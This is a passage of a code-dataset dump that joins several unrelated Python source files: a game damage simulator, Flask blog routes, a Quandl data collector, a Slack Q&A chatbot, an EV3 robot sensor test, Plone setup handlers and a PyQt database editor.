self.potency, self._trait_multipliers,\n self._buff_multipliers, self.guarantee_crit))\n\n\nclass MeleeAttackAction(AutoAttackAction):\n name = 'Attack'\n potency = 110\n\n\nclass ShotAction(AutoAttackAction):\n name = 'Shot'\n potency = 100\n\n\nclass AutoAttackEvent(DamageEvent):\n @property\n def damage(self) -> int:\n if self._damage is not None:\n return self._damage\n\n base_stats = get_base_stats_by_job(self.source.job)\n\n if self.source.job in [Job.BARD, Job.MACHINIST, Job.NINJA]:\n job_attribute_modifier = base_stats[Attribute.DEXTERITY]\n attack_rating = 
self.source.stats[Attribute.DEXTERITY]\n else:\n job_attribute_modifier = base_stats[Attribute.STRENGTH]\n attack_rating = self.source.stats[Attribute.STRENGTH]\n\n weapon_damage = self.source.gear[Slot.WEAPON].physical_damage\n weapon_delay = self.source.gear[Slot.WEAPON].delay\n\n main_stat = main_stat_per_level[self.source.level]\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n\n f_ptc = self.potency / 100\n f_aa = floor(floor((main_stat * job_attribute_modifier / 1000) + weapon_damage) * (weapon_delay / 3))\n f_atk = floor((125 * (attack_rating - 292) / 292) + 100) / 100\n f_det = floor(130 * (self.source.stats[Attribute.DETERMINATION] - main_stat) / divisor + 1000) / 1000\n f_tnc = floor(100 * (self.source.stats[Attribute.TENACITY] - sub_stat) / divisor + 1000) / 1000\n f_chr = floor(200 * (self.source.stats[Attribute.CRITICAL_HIT] - sub_stat) / divisor + 1400) / 1000\n\n damage_randomization = numpy.random.uniform(0.95, 1.05)\n\n damage = f_ptc * f_aa * f_atk * f_det * f_tnc\n\n for m in self.trait_multipliers:\n damage *= m\n\n damage = floor(damage)\n damage = floor(damage * (f_chr if self.is_critical_hit else 1))\n damage = floor(damage * (1.25 if self.is_direct_hit else 1))\n damage = floor(damage * damage_randomization)\n\n for m in self.buff_multipliers:\n damage = floor(damage * m)\n\n self._damage = int(damage)\n\n return self._damage\n\n\nclass FailedActionAttemptError(Exception):\n pass\n\n\nclass ActionOnCooldownError(FailedActionAttemptError):\n def __init__(self, sim: Simulation, source: Actor, action: Action, *args: object, **kwargs: object) -> None:\n super().__init__('%s tried to use %s, but on cooldown for %.3f' %\n (source, action, action.cooldown_remains.total_seconds()), *args, **kwargs)\n\n\nclass ActorAnimationLockedError(FailedActionAttemptError):\n def __init__(self, sim: Simulation, source: Actor, action: Action, *args: object, **kwargs: object) -> None:\n super().__init__('%s tried 
to use %s, but animation locked for %.3f' %\n (source, action, (source.animation_unlock_at - sim.current_time).total_seconds()), *args,\n **kwargs)\n\n\nclass ActorGCDLockedError(FailedActionAttemptError):\n def __init__(self, sim: Simulation, source: Actor, action: Action, *args: object, **kwargs: object) -> None:\n super().__init__('%s tried to use %s, but GCD locked for %.3f' %\n (source, action, (source.gcd_unlock_at - sim.current_time).total_seconds()), *args,\n **kwargs)\n","sub_path":"simfantasy/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":31382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"126864412","text":"from io import BytesIO\nfrom os.path import join\n\nfrom flask import (\n abort, current_app, flash, redirect, render_template,\n request, session, send_file, send_from_directory, url_for)\nfrom flask_login import current_user, login_required\n\nfrom .. import db\nfrom ..models.auth import User\nfrom ..models.auth_units import average, groups, permissions, roots\nfrom ..models.blogs import Entity\nfrom ..models.captcha import Captcha\nfrom ..models.links import Link\nfrom ..models.pictures import Picture\nfrom . 
import main\n\n\n@main.route('/society/', methods=['GET', 'POST'])\n@login_required\ndef show_profile(username):\n target = User.query.filter_by(username=username).first_or_404()\n if current_user != target and \\\n not current_user.can(permissions.FOLLOW_USERS):\n abort(403)\n if request.method == 'POST' and \\\n (current_user != target and\n (current_user.can(permissions.ADMINISTER_SERVICE) or\n (current_user.can(permissions.CHANGE_USER_ROLE) and\n not target.can(permissions.CHANGE_USER_ROLE)) or\n (current_user.group == groups.keeper and\n target.group != groups.keeper and\n not target.can(permissions.ADMINISTER_SERVICE)))):\n if request.form.get('cannot-log-in', None, type=str):\n target.permissions = [permissions.CANNOT_LOG_IN]\n elif request.form.get('administer-service', None, type=str):\n target.permissions = roots\n else:\n current = list()\n for each in average:\n if request.form.get(each, None, type=str):\n current.append(average[each])\n if (permissions.CHANGE_USER_ROLE in current or\n permissions.BLOCK_ENTITY in current) \\\n and permissions.FOLLOW_USERS not in current:\n current.append(permissions.FOLLOW_USERS)\n target.permissions = current or [permissions.CANNOT_LOG_IN]\n db.session.add(target)\n db.session.commit()\n flash('Разрешения {0} успешно изменены.'.format(target.username))\n return redirect(url_for('main.show_profile', username=target.username))\n return render_template('main/profile.html', target=target)\n\n\n@main.route('/')\ndef show_index():\n return render_template('main/index.html')\n\n\n@main.route('/favicon.ico')\ndef show_favicon():\n return send_from_directory(\n join(current_app.static_folder, 'images'), request.path[1:],\n mimetype='image/vnd.microsoft.icon')\n\n\n@main.route('/captcha/')\ndef show_captcha(suffix):\n captcha = Captcha.query.filter_by(suffix=suffix).first_or_404()\n response = send_file(\n BytesIO(captcha.picture), mimetype='image/jpeg', cache_timeout=0)\n response.content_length = len(captcha.picture)\n 
response.cache_control.no_store = True\n response.cache_control.no_cache = True\n response.cache_control.must_revalidate = True\n response.cache_control.public = False\n return response\n\n\n@main.route('/')\ndef jump(suffix):\n if len(suffix) in (6, 7, 9, 10):\n link = Link.query.filter_by(suffix=suffix).first_or_404()\n jumps = session.get('jumps', list())\n if link.suffix not in jumps and current_user != link.author:\n link.clicked += 1\n if link.clicked > 9999:\n link.clicked = 9\n db.session.add(link)\n db.session.commit()\n jumps.append(link.suffix)\n session['jumps'] = jumps\n return redirect(link.url)\n elif len(suffix) in (8, 11, 12, 13):\n entity = Entity.query.filter_by(suffix=suffix).first_or_404()\n return redirect(url_for('blogs.show_entity', slug=entity.slug))\n abort(404)\n\n\n@main.route('/picture/')\ndef show_picture(suffix):\n picture = Picture.query.filter_by(suffix=suffix).first_or_404()\n if current_user != picture.album.author:\n picture.viewed += 1\n db.session.add(picture)\n db.session.commit()\n m_type = 'image/{0}'.format(picture.format.lower())\n response = send_file(BytesIO(picture.picture), mimetype=m_type)\n response.content_length = picture.volume\n return response\n","sub_path":"auriz/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"408253662","text":"\"\"\"\n@author: Sophia Song\n@contact: fsong@splunk.com\n@since: 6/22/16\n\"\"\"\n# Import the necessary package to process data in JSON format\nimport json\nimport os\nimport time\nimport requests\nfrom base.collector_base import ApiCollector,read_conf_item\n\nimport quandl\nAPI_KEYS = read_conf_item('collector', 'FinancialCollector', 'api_key', return_list=True)\n\nclass FeatureCollector(ApiCollector):\n def __init__(self):\n super(FeatureCollector, self).__init__(sourcetype=\"feature\", source='https://www.quandl.com/data/CHRIS')\n\n def 
get_database(self):\n pass\n\n def start(self):\n # data = quandl.get(\"WIKI/MYRG\", authtoken=\"UgH_Za9s6vwzU8JowASW\")\n i=0\n len_api = len(API_KEYS)\n with open(os.path.join(os.path.dirname(__file__), 'CHRIS-datasets-codes.csv'), 'r') as f:\n for line in f.readlines():\n starttime = time.time()\n info = line.split(\",\")[0].split(\"/\")\n database = info[0]\n dataset = info[1]\n key = API_KEYS[i%len_api]\n format = \"csv\"\n i += 1\n endpoint = 'https://www.quandl.com/api/v3/datasets/{database}/{dataset}.{format}?api_key={key}'\\\n .format(database=database,\n dataset=dataset,\n format=format,\n key=key)\n # data = self.request_get(endpoint, use_proxy=True, block=False, callback=self.process_response)\n data = requests.get(endpoint)\n self.output_event(data.content)\n assert data.status_code==200\n endtime = time.time()\n print (i, database, dataset, endtime-starttime, key)\n\n\n def process_response(self, response):\n self.output_event(response.content)\n\n\nif __name__ == '__main__':\n import multiprocessing\n\n results = multiprocessing.Queue()\n feature_collector = FeatureCollector()\n feature_collector.set_result_queue(results)\n feature_collector.start()\n","sub_path":"use_api/financial/futures/feature_collector.py","file_name":"feature_collector.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"103673864","text":"# -*- coding: utf-8 -*-\nfrom docutils.writers.html4css1 import HTMLTranslator\n\n_old_starttag = HTMLTranslator.starttag\n\n\ndef starttag(self, node, tagname, suffix='\\n', empty=False, **attributes):\n attrs = node.non_default_attributes().items()\n attributes.update(dict([(k, v) for k, v in attrs\n if k.startswith('data-')]))\n result = _old_starttag(self, node, tagname,\n suffix=suffix, empty=empty, **attributes)\n return result\n\nHTMLTranslator.starttag = 
starttag\n","sub_path":"impress/monkeys.py","file_name":"monkeys.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"188032980","text":"import json\nfrom slacker import Slacker\nfrom flask import Flask, request, make_response\nimport numpy as np\nimport pandas as pd\nfrom server.db import dbModule as db\nfrom sentence_transformers import SentenceTransformer, util\nimport scipy.stats\n\n\ntoken = ''\nslack = Slacker(token)\n\n# slack.chat.post_message(\"#chatbot-test-channel\", \"slacker 테스트\")\n# 전역변수 선언\nstatus_value = False\ntop_results =''\n\n\ndef reconstruct_dataframe(json_df):\n temp1 = []\n temp2 = []\n id_temp = json_df.loc[0, \"질문 메세지 id\"]\n question_df = json_df.loc[0, \"질문내용\"]\n result_df = \"답변(\" + json_df.loc[0, '답변자 이름'] + \")\" + '\\n' + json_df.loc[0, \"답변내용\"]\n\n for i in range(1, len(json_df)):\n if id_temp != json_df.loc[i, \"질문 메세지 id\"]:\n temp1.append(question_df)\n result_df = \"질문(\" + json_df.loc[i - 1, '질문자 이름'] + ')' + '\\n' + question_df + \"\\n\\n\\n\" +result_df\n temp2.append(result_df)\n result_df = ''\n\n id_temp = json_df.loc[i, \"질문 메세지 id\"]\n question_df = json_df.loc[i, \"질문내용\"]\n result_df = result_df + '\\n\\n' + \"답변(\" + json_df.loc[i, '답변자 이름'] + \")\" + '\\n' + str(json_df.loc[i, \"답변내용\"])\n\n reconstruct_df = pd.DataFrame({\"질문내용\": temp1, \"결과 값\": temp2})\n return reconstruct_df\n\n# 데이터 로드\ndatabase = db.Database()\nqa_sql = \"SELECT * FROM leedo.qa_dataset\"\nig_sql = \"SELECT * FROM leedo.imground\"\ndataset_qa = pd.read_json(json.dumps(database.execute_all(qa_sql)),orient='records')\ndataset_ig = pd.read_json(json.dumps(database.execute_all(ig_sql)),orient='records')\n\ncolumns = ['QAID','질문 날짜','답변 날짜',\n '질문 메세지 id','답변 메세지 id',\n '질문자 id', '답변자 id',\n '질문자 이름', '답변자 이름',\n '질문내용', '답변내용','채널']\ndataset_qa.columns = columns\ndataset_ig.columns = columns\n#dataset_ig = 
pd.read_json('/Users/sinjaeug/Desktop/프로젝트/2020_2학기 프로젝트/Leedo Dataset/imground_dataset.json')\n#dataset_qa = pd.read_json('/Users/sinjaeug/Desktop/프로젝트/2020_2학기 프로젝트/Leedo Dataset/qa_dataset.json')\ndataset_qa = reconstruct_dataframe(dataset_qa)\n\n# 데이터 로드 후 index 순서대로 정렬\n# 코드작성하기!!!!!!!\n##########\n\n\n# Corpus and Name 셋 세팅\n# imground_part\ncorpus_ig = dataset_ig['content'].values.tolist()\ncorpus_ig = [word.replace('\\xa0', ' ') for word in corpus_ig]\nname_ig = dataset_ig['name'].values.tolist()\nname_ig = [word.replace('\\xa0',' ') for word in name_ig]\n\n# qa_part\ncorpus_qa = dataset_qa['질문내용'].values.tolist()\ncorpus_answer = dataset_qa['결과 값'].values.tolist()\n\nattachment_answer_json = {\n\t\"blocks\": [\n\t\t{\n\t\t\t\"type\": \"actions\",\n\t\t\t\"elements\": [\n\t\t\t\t{\n\t\t\t\t\t\"type\": \"static_select\",\n\t\t\t\t\t\"placeholder\": {\n\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\"text\": \"유사한 질문 목록\"\n\t\t\t\t\t},\n\t\t\t\t\t\"options\": [\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"1\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"0\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"2\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"1\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"3\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"2\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"4\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"3\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"5\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"4\"\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t\t\"action_id\": 
\"actionId-3\"\n\t\t\t\t}\n\t\t\t]\n\t\t}\n\t]\n}\n\n\n# embedding 모듈 load\n\n\n# 1.2 ver\nmodel_path = './output/training_stsbenchmark_distilbert-base-multilingual-cased-v2-KakaoSTS'\nembedder = SentenceTransformer(model_path)\n# embedder = SentenceTransformer('distiluse-base-multilingual-cased-v2') # 1.1ver\n# embedder = SentenceTransformer('xlm-r-bert-base-nli-stsb-mean-tokens')\n\n\n# corpus Embedding\ncorpus_embeddings_qa = embedder.encode(corpus_qa, convert_to_tensor=True)\ncorpus_embeddings_ig = embedder.encode(corpus_ig, convert_to_tensor=True)\n\n\napp = Flask(__name__)\n\n\ndef get_answer():\n return \"EA (EconoAsistant) 사용법 \\n\\n1. Q&A \\n\\n - 키워드를 통해 분야에 대해 알아봐요 - \\n \" \\\n \"느낌표 1개 (!)를 붙이고 키워드나 문구를 \\n 적으면 관련된 질의 응답을 알려드립니다.\\n\\n2. \" \\\n \"I'm Ground \\n\\n - 키워드를 통해 에코노인을 알아봐요 - \\n 느낌표 2개 (!!)를 붙이고 키워드나 \" \\\n \"문구를 \\n 적으면 관련된 사람을 알려드립니다. \\n\\n%주의사항% \\n\\n - 맞춤법 필수, 이모티콘이�� \" \\\n \"특수문자를 사용하지 마세요 \"\n\n\ndef event_handler(event_type, slack_event):\n print(\"3번오류\")\n if event_type == \"app_mention\":\n channel = slack_event[\"event\"][\"channel\"]\n text = get_answer()\n slack.chat.post_message(channel, text)\n return make_response(\"앱 멘션 메시지가 보내졌습니다.\", 202,)\n\n if event_type == \"message\":\n channel = slack_event[\"event\"][\"channel\"]\n message_query = slack_event[\"event\"][\"text\"]\n text = ''\n if message_query[1] == '!':\n text = im_ground(message_query)\n slack.chat.post_message(channel, text)\n else:\n text = question_answer(message_query)\n print(text)\n slack.chat.post_message(channel, attachments=[text])\n\n return make_response(\"앱 멘션 메시지가 보내졌습니다.\", 202,)\n\n message = \"[%s] 이벤트 핸들러를 찾을 수 없습니다\" % event_type\n return make_response(message, 200, {\"X-Slack-No-Retry\": 1})\n\n\ndef query_confirm(query_input):\n global status_value\n if query_input[0:1] == \"!\" or query_input[0:2] == \"!!\":\n status_value = True\n return True\n else:\n status_value = False\n return False\n\n\n# !를 제거 하는 함수\ndef 
delete_exclamation_mark(query_input):\n if query_input[0:1] == \"!\":\n return query_input[1:]\n elif query_input[0:2] == \"!!\":\n return query_input[2:]\n\n\ndef question_answer(query_input):\n global top_results\n query = delete_exclamation_mark(query_input)\n\n # query embedding\n query_embedding = embedder.encode(query, convert_to_tensor=True)\n\n # Spearman 상관계수가 0.3보다 높은 값의 내용만 얻음\n Top_Context = []\n\n for idx in range(len(corpus_embeddings_ig)):\n spearmanr = scipy.stats.spearmanr(query_embedding, corpus_embeddings_qa[idx])\n if abs(spearmanr[0]) > 0.3:\n Top_Context.append([spearmanr[0], idx])\n\n # 상위부터 정렬\n Top_Context = sorted(Top_Context, reverse=True)\n\n top_k = 5\n\n read_text_to_json = json.dumps(attachment_answer_json)\n read_json = json.loads(read_text_to_json)\n\n for i in range(top_k):\n temp_str = str(i + 1) + \"번 \" + corpus_qa[Top_Context[idx][1]].strip()\n temp_str = temp_str[0:30] + \"(%2.f%%)\" % (Top_Context[idx][0]*100)\n read_json[\"blocks\"][0]['elements'][0]['options'][i]['text']['text'] = temp_str\n\n return read_json\n\n\ndef im_ground(query_input):\n query = delete_exclamation_mark(query_input)\n\n # query_embedding\n query_embedding = embedder.encode(query, convert_to_tensor=True)\n\n # Spearman 상관계수가 0.3보다 높은 값의 내용만 얻음\n Top_Context = []\n\n for idx in range(len(corpus_embeddings_ig)):\n spearmanr = scipy.stats.spearmanr(query_embedding, corpus_embeddings_ig[idx])\n if abs(spearmanr[0]) > 0.3:\n Top_Context.append([spearmanr[0], idx])\n\n #상위부터 정렬\n Top_Context = sorted(Top_Context, reverse=True)\n\n name_overlap = []\n\n number = 1\n result = \"\"\n\n # 상위 5개 출력 (중복제거)\n\n for idx in range(len(Top_Context)):\n if number > 5:\n break\n if not name_ig[Top_Context[idx][1]] in name_overlap:\n temp = str(idx + 1) + \"번\" + name_ig[Top_Context[idx][1]].strip() + \", \" + corpus_ig[Top_Context[idx][1]].strip() + \"\\n\"\n result = result + str(temp)\n name_overlap.append(name_ig[Top_Context[idx][1]].strip())\n number += 1\n\n 
\"\"\"print(\"유사도 : \", Top_Context[idx][0])\n print(\"이름 : \", name[Top_Context[idx][1]])\n print(\"내용 : \", corpus[Top_Context[idx][1]])\n name_overlap.append(name[Top_Context[idx][1]].strip())\n number += 1\"\"\"\n\n return result\n\n\n@app.route(\"/slack\", methods=[\"GET\", \"POST\"])\ndef hears():\n slack_event = json.loads(request.data)\n print(\"1번 오류\")\n if \"challenge\" in slack_event: # 슬랙이 정상적으로 웹서버가 동작하는지 확인하는 과정\n return make_response(slack_event[\"challenge\"], 200,\n {\"content_type\": \"application/json\"})\n\n if \"event\" in slack_event:\n event_type = slack_event[\"event\"][\"type\"]\n message_query = slack_event[\"event\"][\"text\"]\n if query_confirm(message_query):\n return event_handler(event_type, slack_event)\n return make_response(\"슬랙 요청에 이벤트가 없습니다\", 404,\n {\"X-Slack-No-Retry\": 1})\n return make_response(\"슬랙 요청에 이벤트가 없습니다\", 404,\n {\"X-Slack-No-Retry\": 1})\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n return \"Hello World\"\n\n\n@app.route(\"/slack/message_actions\", methods=[\"POST\"])\ndef message_actions():\n # 리퀘스트 파징\n form_json = json.loads(request.form[\"payload\"])\n\n print(\"2번오류\")\n # 선택한 값이 버튼일 때\n selection = form_json[\"actions\"][0][\"selected_option\"][\"value\"]\n slack.chat.update(form_json[\"channel\"][\"id\"], form_json[\"container\"][\"message_ts\"], corpus_answer[top_results[int(selection)]])\n\n return make_response(\"\", 200)\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"635049680","text":"#!/usr/bin/python3\n\nfrom time import sleep\n\nfrom ev3dev.ev3 import *\n\nultraMotor = MediumMotor(OUTPUT_C)\nassert ultraMotor.connected, \"Error: Ultra motor not connected\"\nultraMotor.reset() # Set the current angle to 0\nultraMotor.stop_action = \"brake\"\n\n# Will need to check EV3 
button state\nbtn = Button()\n\n# Connect ultrasonic sensor\n# https://sites.google.com/site/ev3python/learn_ev3_python/using-sensors\n# https://media.readthedocs.org/pdf/ev3dev-lang/latest/ev3dev-lang.pdf\nultraSensor = UltrasonicSensor()\nassert ultraSensor.connected, \"Error: Ultrasonic sensor not connected\"\nultraSensor.mode = \"US-DIST-CM\" # This is actually in millimetres\n\nSPEED = 360\n\ndef scan_turret():\n ultraMotor.position_sp = 0\n ultraMotor.run_to_abs_pos(speed_sp = SPEED)\n while any(ultraMotor.state): # Wait until finished rotating\n sleep(0.02)\n front = ultraSensor.value() // 42\n\n ultraMotor.position_sp = -90\n ultraMotor.run_to_abs_pos(speed_sp = SPEED)\n while any(ultraMotor.state): # Wait until finished rotating\n sleep(0.02)\n left = ultraSensor.value() // 42\n\n ultraMotor.position_sp = 90\n ultraMotor.run_to_abs_pos(speed_sp = SPEED)\n while any(ultraMotor.state): # Wait until finished rotating\n sleep(0.02)\n right = ultraSensor.value() // 42\n\n print(\"front walls: %d\" % front)\n print(\"left walls: %d\" % left)\n print(\"right walls: %d\" % right)\n\nwhile not (btn.any()):\n x = int(input())\n scan_turret()\n","sub_path":"testultra.py","file_name":"testultra.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"429859185","text":"from Products.CMFCore.utils import getToolByName\nfrom plonede.content.config import PROJECTNAME\nfrom Products.CMFPlone.interfaces import IPropertiesTool\n\n# maybe we use this later on\n#_PROPERTIES = [\n# dict(name='prop', type_='string', value='val'),\n#]\n\ndef setupVarious(context):\n\n if context.readDataFile('plonede.content_various.txt') is None:\n return\n \n site = context.getSite()\n logger = context.getLogger(PROJECTNAME)\n\n #setVersionedTypes(site)\n #add_catalog_indexes(site, logger)\n #setProperties(site)\n\n\ndef setProperties(site):\n \"\"\"Enable versioning for custom content types used by 
iterate\n \"\"\"\n properties_tool = getToolByName(site, 'portal_properties')\n properties = properties_tool.plonede_properties\n\n for property in _PROPERTIES:\n if not properties.hasProperty(property['name']):\n properties.manage_addProperty(property['name'], property['value'], property['type_'])\n \ndef add_catalog_indexes(site, logger):\n \"\"\"Add our indexes to the catalog.\n\n Doing it here instead of in profiles/default/catalog.xml means we\n do not need to reindex those indexes after every reinstall.\n \"\"\"\n catalog = getToolByName(site, 'portal_catalog')\n indexes = catalog.indexes()\n\n wanted = ((\"fieldname\", \"FieldIndex\"),\n )\n \n for name, meta_type in wanted:\n if name not in indexes:\n catalog.addIndex(name, meta_type)\n logger.info(\"Added %s for field %s.\", meta_type, name)\n \n if name not in catalog.schema():\n catalog.addColumn(name)\n logger.info(\"Added Column for %s.\", name)\n","sub_path":"src/plonede.content/plonede/content/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457535062","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui, QtSql, uic\nimport QEditorAbstract, QWSException, QExceptionDefines, Settings\n\n\n\nclass QZoneEditError(QWSException.QWSException) :\n\tdef __init__(self, code, message, sqlQuery):\n\t\tQWSException.QWSException.__init__(self, code, message)\n\t\tself.sqlQuery = sqlQuery\n\n\n\nclass Zones_Edit_Win_Class(QEditorAbstract.QEditorAbstract) :\n\tdef __init__(self, parent, zone_id=None) :\n\t\tQEditorAbstract.QEditorAbstract.__init__(self, parent, QtCore.Qt.WindowTitleHint)\n\t\tuic.loadUi(\"ui/zoneEditor.ui\", self)\n\n\t\tself.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n\n\t\t# Link to Zone Window\n\t\tself.Zone_Window_Link = parent\n\n\t\t# Win Title\n\t\tself.setWindowTitle(Settings.Settings().winTitleName('Редактор 
зон'))\n\n\t\tQtCore.QObject.connect(self.bbxOkCancel, QtCore.SIGNAL('accepted()'), self._ok)\n\t\tQtCore.QObject.connect(self.bbxOkCancel, QtCore.SIGNAL('rejected()'), self._cancel)\n\n\t\t# Database Zone ID\n\t\tself.zone_id = zone_id\n\n\n\tdef _createObject(self):\n\t\ttry:\n\t\t\tzoneName = self.ledZoneName.text()\n\t\t\tzoneTariff = self.ledTariff.text()\n\n\t\t\tcreateQuery = QtSql.QSqlQuery()\n\t\t\tif not createQuery.prepare(\"INSERT INTO TAXI_ZONES (ZONE_NAME, ORDER_DISCOUNT) \"\n\t\t\t\t\t\t\t\t\t\t\t\t\"VALUES (:zone_name, :order_discount) RETURNING ID_ZONE\"):\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_PREPAREQUERYFAILED(), 'Cannot prepare sql query.', createQuery)\n\n\t\t\tcreateQuery.bindValue(\":zone_name\", zoneName)\n\t\t\tif zoneTariff == '' : createQuery.bindValue(\":order_discount\", None)\n\t\t\tif not createQuery.exec_():\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_EXECQUERYFAILED(), 'Cannot exec sql query.', createQuery)\n\t\t\tif not createQuery.first():\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_GETFIRSTRECFAILED(), 'Cannot get first query.', createQuery)\n\t\t\telse: return createQuery.value(0)\n\n\t\texcept QZoneEditError as err:\n\t\t\tprint (err.code, err.message, '\\n', err.sqlQuery.lastQuery(), err.sqlQuery.lastError().text())\n\n\n\tdef _updateObject(self, id):\n\t\ttry:\n\t\t\tzoneName = self.ledZoneName.text()\n\t\t\tzoneTariff = self.ledTariff.text()\n\n\t\t\tupdateQuery = QtSql.QSqlQuery()\n\t\t\tif not updateQuery.prepare(\"UPDATE TAXI_ZONES SET ZONE_NAME=:zone_name, ORDER_DISCOUNT=:order_discount\"\n\t\t\t\t\t\t\t\t\t\t\t\t\" WHERE ID_ZONE=:id_zone\"):\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_PREPAREQUERYFAILED(), 'Cannot prepare sql query.', updateQuery)\n\t\t\tupdateQuery.bindValue(\":zone_name\", zoneName)\n\t\t\tupdateQuery.bindValue(\":order_discount\", zoneTariff)\n\t\t\tupdateQuery.bindValue(\":id_zone\", id)\n\t\t\tif not updateQuery.exec_():\n\t\t\t\traise 
QZoneEditError(QExceptionDefines.QTSQLERR_EXECQUERYFAILED(), 'Cannot exec sql query.', updateQuery)\n\t\t\treturn True\n\n\t\texcept QZoneEditError as err:\n\t\t\tprint (err.code, err.message, '\\n', err.sqlQuery.lastQuery(), err.sqlQuery.lastError().text())\n\n\n\tdef _validateFormData(self, id):\n\t\ttry:\n\n\t\t\tzoneName = \" \".join(self.ledZoneName.text().split()).rstrip().lstrip()\n\t\t\tself.ledZoneName.setText(zoneName)\n\n\t\t\tzoneTariff = \" \".join(self.ledTariff.text().split()).rstrip().lstrip()\n\t\t\tself.ledTariff.setText(zoneTariff)\n\n\t\t\tif zoneName == '':\n\t\t\t\tself.ledZoneName.setFocus()\n\t\t\t\tQtGui.QMessageBox.critical(self, \"Ошибка\", \"Название зоны не может быть пустым.\", QtGui.QMessageBox.Ok)\n\t\t\t\treturn False\n\n\t\t\telse:\n\t\t\t\tif id is not None:\n\t\t\t\t\tcheckQuery = QtSql.QSqlQuery()\n\t\t\t\t\tif not checkQuery.prepare(\"SELECT ZONE_NAME FROM TAXI_ZONES WHERE (ZONE_NAME=:zone AND ID_ZONE<>:idZone)\"):\n\t\t\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_PREPAREQUERYFAILED(), 'Cannot prepare sql query.', checkQuery)\n\t\t\t\t\tcheckQuery.bindValue(\":zone\", self.ledZoneName.text())\n\t\t\t\t\tcheckQuery.bindValue(\":idZone\", id)\n\t\t\t\t\tif not checkQuery.exec_(): QZoneEditError(QExceptionDefines.QTSQLERR_EXECQUERYFAILED(), 'Cannot exec sql query.', checkQuery)\n\t\t\t\t\tif checkQuery.first() :\n\t\t\t\t\t\tQtGui.QMessageBox.critical(self, \"Ошибка\", \"Такая зона уже существует.\", QtGui.QMessageBox.Ok)\n\t\t\t\t\t\treturn False\n\t\t\t\treturn True\n\n\n\t\texcept QZoneEditError as err:\n\t\t\tprint (err.code, err.message, '\\n', err.sqlQuery.lastQuery(), err.sqlQuery.lastError().text())\n\n\n\tdef _clearFormData(self):\n\t\tself.ledZoneName.clear()\n\t\tself.ledTariff.clear()\n\n\n\tdef _fillFormData(self, id):\n\t\ttry:\n\t\t\tinitQuery = QtSql.QSqlQuery()\n\t\t\tif not initQuery.prepare(\"SELECT ZONE_NAME, ORDER_DISCOUNT FROM TAXI_ZONES WHERE ID_ZONE=:idZone\"):\n\t\t\t\traise 
